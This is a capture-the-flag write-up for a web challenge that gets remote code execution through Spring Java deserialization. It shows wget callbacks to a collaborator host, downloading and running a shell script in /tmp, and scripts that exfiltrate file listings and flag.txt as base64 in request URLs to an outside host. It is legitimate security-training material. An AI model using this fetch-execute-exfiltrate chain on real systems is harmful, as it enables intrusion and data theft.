Tags: spring java-serialization rce java 

Rating:

# ▼▼▼TOO_MANY_CREDITS_2(Web:432pts,71/661=10.7%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

---

## 【Aim for RCE with Java serialization】

Using BurpSuite Extender **Java Deserialization Scanner**

(Reference) `https://portswigger.net/bappstore/228336544ebe4e68824b5146dbbd93ae`

It turns out to be `Spring serialization`

---

## 【Try and error】

Exploit `Spring` with BurpSuite Extender

```
○Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net"         ⇒GET /
×Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net --user-agent test" ⇒ No access
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`echo 'test'`"    ⇒GET /`echo
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`echo test`"    ⇒GET /`echo
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`id`"       ⇒GET /`id`
  ※Backquotes are treated as letters
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/$(id)"      ⇒GET /$(id)
  ※$(id) are treated as letters
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/|id"       ⇒GET /|id
  ※| are treated as letters
×Spring2 "sleep 10;wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/sleep"   ⇒ No access
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/sleep;sleep 10"   ⇒GET /sleep;sleep
  ※; are treated as letters. Terminated by a `space`.
```

Some characters seem to be unusable.

---

## 【Finally】

Finally, I wrote a shell file to the server and executed the shell

```
○Spring2 "wget -P /tmp/ http://my_server/kaz.sh"
○Spring2 "sh /tmp/kaz.sh"
```

---

## 【exploit】

Create **the following file** and put it on **my_server**, and writable under `/tmp/` folder

kaz5.sh
```
#!/bin/bash
wget http://ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net/`ls|base64`
```

Write the file obtained by wget in the `/tmp/` folder
```
Spring2 "wget -P /tmp/ http://my_server/kaz5.sh"
```

---

Execute file
```
Spring2 "sh /tmp/kaz5.sh"
```

↓ Access comes to my_server

```
GET /YmluCmZsYWcudHh0CmxpYgo= HTTP/1.1
Host: ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net
```

`YmluCmZsYWcudHh0CmxpYgo=`

↓ base64 decode

```
bin
flag.txt
lib
```

---

## 【Get flag】

```
#!/bin/bash
wget http://ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net/`cat flag.txt|base64`
```

```
Spring2 "wget -P /tmp/ http://my_server/kaz10.sh"
Spring2 "sh /tmp/kaz10.sh"
```

↓ Access comes to my_server

```
GET /Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg== HTTP/1.1
Host: ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net
```

`Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg==`

↓ base64 decode

`gigem{da$h_3_1s_A_l1f3seNd}`